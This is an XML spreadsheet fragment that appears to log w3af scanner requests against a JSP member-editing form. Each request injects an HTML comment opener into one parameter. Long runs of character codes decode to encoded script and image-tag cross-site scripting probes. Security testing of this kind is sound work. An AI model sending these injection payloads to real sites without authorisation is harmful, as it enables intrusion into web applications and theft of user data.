    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;!--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=&lt;!--&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john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&lt;!--&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=&lt;!--&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=&lt;!--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=&lt;!--&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=&lt;!--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&lt;!--&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=&lt;!--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=&lt;!--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&lt;!--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56&amp;email=w3af@email.com&amp;modo=&lt;!--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;!--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&lt;!--&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=&lt;!--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=&lt;!--&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=&lt;!--&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=&lt;!--&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar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1,52,37,50,53,50,67,54,50,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,52,56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1,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,57,55,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,54,37,50,53,50,67,52,48,37,50,53,50,67,51,57,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,51,57,37,50,53,50,67,52,49,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48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1,57,37,50,53,50,67,51,57,37,50,53,50,67,53,57,37,50,53,50,67,51,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,52,37,50,53,50,67,54,48,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,54,50,37,50,53,50,67,54,49,37,50,53,50,67,51,56,37,50,53,50,67,49,50,51,37,50,53,50,67,52,48,37,50,53,50,67,52,49,37,50,53,50,67,49,50,53,37,50,53,50,67,51,5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2,55,37,50,53,50,67,56,52,37,50,53,50,67,55,51,37,50,53,50,67,56,52,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49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1,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,51,37,50,53,50,67,51,50,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,52,37,50,53,50,67,57,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,50,48,37,50,53,50,67,53,56,37,50,53,50,67,49,50,48,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53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4,37,50,53,50,67,55,57,37,50,53,50,67,54,56,37,50,53,50,67,56,57,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,51,51,37,50,53,50,67,51,53,37,50,53,50,67,51,54,37,50,53,50,67,51,55,37,50,53,50,67,51,56,37,50,53,50,67,52,48,37,50,53,50,67,52,49,37,50,53,50,67,52,50,37,50,53,50,67,49,50,54,37,50,53,50,67,52,51,37,50,53,50,67,52,53,37,50,53,50,67,57,53,37,50,53,50,67,52,54,37,50,53,50,67,52,52,37,50,53,50,67,53,56,37,50,53,50,67,53,57,37,50,53,50,67,54,51,37,50,53,50,67,54,52,37,50,53,50,67,57,49,37,50,53,50,67,52,55,37,50,53,50,67,49,50,52,37,50,53,50,67,57,50,37,50,53,50,67,57,51,37,50,53,50,67,57,52,37,50,53,50,67,57,54,37,50,53,50,67,54,49,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,55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1,57,37,50,53,50,67,51,57,37,50,53,50,67,53,57,37,50,53,50,67,51,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,52,37,50,53,50,67,54,48,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,54,50,37,50,53,50,67,54,49,37,50,53,50,67,51,56,37,50,53,50,67,49,50,51,37,50,53,50,67,52,48,37,50,53,50,67,52,49,37,50,53,50,67,49,50,53,37,50,53,50,67,51,5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1,52,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,57,55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49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,52,57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7,54,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,57,54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1,52,37,50,53,50,67,51,52,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50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1,52,37,50,53,50,67,51,50,37,50,53,50,67,51,56,37,50,53,50,67,51,53,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,57,37,50,53,50,67,51,50,37,50,53,50,67,51,50,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48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49,48,49,37,50,53,50,67,49,48,52,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,53,56,37,50,53,50,67,51,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,52,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,52,49,37,50,53,50,67,53,57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48,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,54,48,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48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1,52,37,50,53,50,67,53,57,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,52,55,37,50,53,50,67,52,55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1,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,51,57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4,37,50,53,50,67,55,57,37,50,53,50,67,54,56,37,50,53,50,67,56,57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7,56,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,52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6,37,50,53,50,67,56,48,37,50,53,50,67,56,53,37,50,53,50,67,56,52,37,50,53,50,67,51,50,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,56,48,37,50,53,50,67,54,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,55,51,37,50,53,50,67,55,55,37,50,53,50,67,54,53,37,50,53,50,67,55,49,37,50,53,50,67,54,57,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,57,57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4,37,50,53,50,67,55,57,37,50,53,50,67,54,56,37,50,53,50,67,56,57,37,50,53,50,67,51,50,37,50,53,50,67,55,57,37,50,53,50,67,55,56,37,50,53,50,67,55,54,37,50,53,50,67,55,57,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,54,49,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,57,56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4,56,37,50,53,50,67,56,57,37,50,53,50,67,55,56,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,54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5,54,37,50,53,50,67,55,57,37,50,53,50,67,56,55,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,57,56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4,37,50,53,50,67,55,49,37,50,53,50,67,56,51,37,50,53,50,67,55,57,37,50,53,50,67,56,53,37,50,53,50,67,55,56,37,50,53,50,67,54,56,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,5